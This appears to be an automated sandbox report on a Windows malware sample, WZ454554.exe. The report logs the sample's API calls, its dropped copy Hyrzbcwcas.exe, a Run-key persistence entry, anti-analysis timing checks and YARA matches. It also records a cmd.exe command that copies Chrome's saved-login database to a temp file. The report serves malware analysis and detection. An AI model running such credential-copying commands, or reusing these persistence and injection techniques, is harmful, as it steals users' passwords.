Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00AF97A0 NtUnmapViewOfSection,LdrInitializeThunk,	9_2_00AF97A0
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00AF9780 NtMapViewOfSection,LdrInitializeThunk,	9_2_00AF9780
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00AF9710 NtQueryInformationToken,LdrInitializeThunk,	9_2_00AF9710
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00AF98A0 NtWriteVirtualMemory,	9_2_00AF98A0
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00AF9820 NtEnumerateKey,	9_2_00AF9820
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00AFB040 NtSuspendThread,	9_2_00AFB040
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00AF99D0 NtCreateProcessEx,	9_2_00AF99D0
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00AF9950 NtQueueApcThread,	9_2_00AF9950
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00AF9A80 NtOpenDirectoryObject,	9_2_00AF9A80
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00AF9A10 NtQuerySection,	9_2_00AF9A10
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00AFA3B0 NtGetContextThread,	9_2_00AFA3B0
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_0041A330 NtCreateFile,	17_2_0041A330
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_0041A3E0 NtReadFile,	17_2_0041A3E0
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_0041A460 NtClose,	17_2_0041A460
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_0041A510 NtAllocateVirtualMemory,	17_2_0041A510
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_0041A3DB NtReadFile,	17_2_0041A3DB
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_0041A387 NtReadFile,	17_2_0041A387
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_0041A45A NtClose,	17_2_0041A45A
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_0041A50B NtAllocateVirtualMemory,	17_2_0041A50B
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA98F0 NtReadVirtualMemory,LdrInitializeThunk,	17_2_00AA98F0
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA9860 NtQuerySystemInformation,LdrInitializeThunk,	17_2_00AA9860
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA9840 NtDelayExecution,LdrInitializeThunk,	17_2_00AA9840
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA99A0 NtCreateSection,LdrInitializeThunk,	17_2_00AA99A0
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	17_2_00AA9910
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA9A20 NtResumeThread,LdrInitializeThunk,	17_2_00AA9A20
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA9A00 NtProtectVirtualMemory,LdrInitializeThunk,	17_2_00AA9A00
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA9A50 NtCreateFile,LdrInitializeThunk,	17_2_00AA9A50
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA95D0 NtClose,LdrInitializeThunk,	17_2_00AA95D0
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA9540 NtReadFile,LdrInitializeThunk,	17_2_00AA9540
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA96E0 NtFreeVirtualMemory,LdrInitializeThunk,	17_2_00AA96E0
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA9660 NtAllocateVirtualMemory,LdrInitializeThunk,	17_2_00AA9660
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA97A0 NtUnmapViewOfSection,LdrInitializeThunk,	17_2_00AA97A0
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA9780 NtMapViewOfSection,LdrInitializeThunk,	17_2_00AA9780
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA9710 NtQueryInformationToken,LdrInitializeThunk,	17_2_00AA9710
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA98A0 NtWriteVirtualMemory,	17_2_00AA98A0
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA9820 NtEnumerateKey,	17_2_00AA9820
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AAB040 NtSuspendThread,	17_2_00AAB040
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA99D0 NtCreateProcessEx,	17_2_00AA99D0
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA9950 NtQueueApcThread,	17_2_00AA9950
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA9A80 NtOpenDirectoryObject,	17_2_00AA9A80
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA9A10 NtQuerySection,	17_2_00AA9A10
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AAA3B0 NtGetContextThread,	17_2_00AAA3B0
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA9B00 NtSetValueKey,	17_2_00AA9B00
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA95F0 NtQueryInformationFile,	17_2_00AA95F0
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA9520 NtWaitForSingleObject,	17_2_00AA9520
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AAAD30 NtSetContextThread,	17_2_00AAAD30
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA9560 NtWriteFile,	17_2_00AA9560
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA96D0 NtCreateKey,	17_2_00AA96D0
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA9610 NtEnumerateValueKey,	17_2_00AA9610
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA9670 NtQueryInformationProcess,	17_2_00AA9670
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA9650 NtQueryValueKey,	17_2_00AA9650
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA9FE0 NtCreateMutant,	17_2_00AA9FE0
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA9730 NtQueryVirtualMemory,	17_2_00AA9730
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AAA710 NtOpenProcessToken,	17_2_00AAA710
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA9760 NtOpenProcess,	17_2_00AA9760
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AA9770 NtSetInformationFile,	17_2_00AA9770
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00AAA770 NtOpenThread,	17_2_00AAA770

Sample file is different than original file name gathered from version info

Source: WZ454554.exe	Binary or memory string: OriginalFilename vs WZ454554.exe
Source: WZ454554.exe, 00000002.00000003.285784160.000000000362C000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamePlayMaS EFx.CPL\: vs WZ454554.exe
Source: WZ454554.exe, 00000002.00000000.283086570.0000000000498000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamePlayMaS EFx.CPL\: vs WZ454554.exe
Source: WZ454554.exe, 00000002.00000003.283955889.0000000003690000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamePlayMaS EFx.CPL\: vs WZ454554.exe
Source: WZ454554.exe, 00000009.00000000.322831232.0000000000498000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamePlayMaS EFx.CPL\: vs WZ454554.exe
Source: WZ454554.exe, 00000009.00000002.410637371.0000000000D3F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs WZ454554.exe
Source: WZ454554.exe, 00000009.00000002.414071271.0000000002A54000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenameHelp.Exej% vs WZ454554.exe
Source: WZ454554.exe, 00000009.00000002.408113212.0000000000659000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameHelp.Exej% vs WZ454554.exe
Source: WZ454554.exe, 00000009.00000002.408188246.0000000000667000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameHelp.Exej% vs WZ454554.exe
Source: WZ454554.exe, 00000009.00000002.409087872.0000000000BAF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs WZ454554.exe

PE file contains strange resources

Source: WZ454554.exe	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: WZ454554.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WZ454554.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: WZ454554.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Hyrzbcwcas.exe.2.dr	Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: Hyrzbcwcas.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Hyrzbcwcas.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Hyrzbcwcas.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Tries to load missing DLLs

Source: C:\Users\user\Desktop\WZ454554.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Desktop\WZ454554.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Users\user\Desktop\WZ454554.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Users\user\Desktop\WZ454554.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Users\user\Desktop\WZ454554.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Section loaded: mpclient.dll	Jump to behavior

Source: WZ454554.exe	Virustotal: Detection: 22%
Source: WZ454554.exe	ReversingLabs: Detection: 39%

Source: C:\Users\user\Desktop\WZ454554.exe

File read: C:\Users\user\Desktop\WZ454554.exe

Source: unknown	Process created: C:\Users\user\Desktop\WZ454554.exe "C:\Users\user\Desktop\WZ454554.exe"
Source: C:\Users\user\Desktop\WZ454554.exe	Process created: C:\Users\user\Desktop\WZ454554.exe C:\Users\user\Desktop\WZ454554.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Contacts\Hyrzbcwcas.exe "C:\Users\user\Contacts\Hyrzbcwcas.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Contacts\Hyrzbcwcas.exe "C:\Users\user\Contacts\Hyrzbcwcas.exe"
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Process created: C:\Users\user\Contacts\Hyrzbcwcas.exe C:\Users\user\Contacts\Hyrzbcwcas.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Process created: C:\Users\user\Contacts\Hyrzbcwcas.exe C:\Users\user\Contacts\Hyrzbcwcas.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\help.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: C:\Users\user\Desktop\WZ454554.exe	Process created: C:\Users\user\Desktop\WZ454554.exe C:\Users\user\Desktop\WZ454554.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\Contacts\Hyrzbcwcas.exe "C:\Users\user\Contacts\Hyrzbcwcas.exe"	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Process created: C:\Users\user\Contacts\Hyrzbcwcas.exe C:\Users\user\Contacts\Hyrzbcwcas.exe	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Process created: C:\Users\user\Contacts\Hyrzbcwcas.exe C:\Users\user\Contacts\Hyrzbcwcas.exe	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V	Jump to behavior

Source: C:\Users\user\Desktop\WZ454554.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\WZ454554.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\WZ454554.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Users\user\Desktop\WZ454554.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\WZ454554.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Yara match	File source: WZ454554.exe, type: SAMPLE
Source: Yara match	File source: 21.0.Hyrzbcwcas.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.Hyrzbcwcas.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.Hyrzbcwcas.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.Hyrzbcwcas.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.WZ454554.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.WZ454554.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Hyrzbcwcas.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.Hyrzbcwcas.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.WZ454554.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Hyrzbcwcas.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.Hyrzbcwcas.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Hyrzbcwcas.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000000.416006494.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.323155523.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.321956986.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.360667337.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.322739212.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.417791279.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.322356028.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.363228459.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.417110071.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.395638954.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.558403513.0000000002FA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.398461439.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.397793786.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.283008845.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.415275359.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.397308343.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.342065760.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.362225116.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.361296807.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\Contacts\Hyrzbcwcas.exe, type: DROPPED

Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_0041D976 push dword ptr [4B077C1Dh]; ret	9_2_0041DA7F
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00417103 pushfd ; retf	9_2_0041711E
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_004169FE push eax; retf	9_2_004169FF
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_0041D4E2 push eax; ret	9_2_0041D4E8
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_0041D4EB push eax; ret	9_2_0041D552
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_0041D495 push eax; ret	9_2_0041D4E8
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_0041D54C push eax; ret	9_2_0041D552
Source: C:\Users\user\Desktop\WZ454554.exe	Code function: 9_2_00B0D0D1 push ecx; ret	9_2_00B0D0E4
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_0041D976 push dword ptr [4B077C1Dh]; ret	17_2_0041DA7F
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00417103 pushfd ; retf	17_2_0041711E
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_004169FE push eax; retf	17_2_004169FF
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_0041D4E2 push eax; ret	17_2_0041D4E8
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_0041D4EB push eax; ret	17_2_0041D552
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_0041D495 push eax; ret	17_2_0041D4E8
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_0041D54C push eax; ret	17_2_0041D552
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Code function: 17_2_00ABD0D1 push ecx; ret	17_2_00ABD0E4

Source: C:\Users\user\Desktop\WZ454554.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Hyrzbcwcas			Jump to behavior
Source: C:\Users\user\Desktop\WZ454554.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Hyrzbcwcas			Jump to behavior

Source: C:\Users\user\Desktop\WZ454554.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WZ454554.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WZ454554.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WZ454554.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WZ454554.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WZ454554.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\WZ454554.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\help.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\WZ454554.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\WZ454554.exe	RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Contacts\Hyrzbcwcas.exe	RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe	RDTSC instruction interceptor: First address: 0000000002B19904 second address: 0000000002B1990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe	RDTSC instruction interceptor: First address: 0000000002B19B7E second address: 0000000002B19B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe	RDTSC instruction interceptor: First address: 0000000003009904 second address: 000000000300990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe	RDTSC instruction interceptor: First address: 0000000003009B7E second address: 0000000003009B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe	RDTSC instruction interceptor: First address: 0000000002AD9904 second address: 0000000002AD990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe	RDTSC instruction interceptor: First address: 0000000002AD9B7E second address: 0000000002AD9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

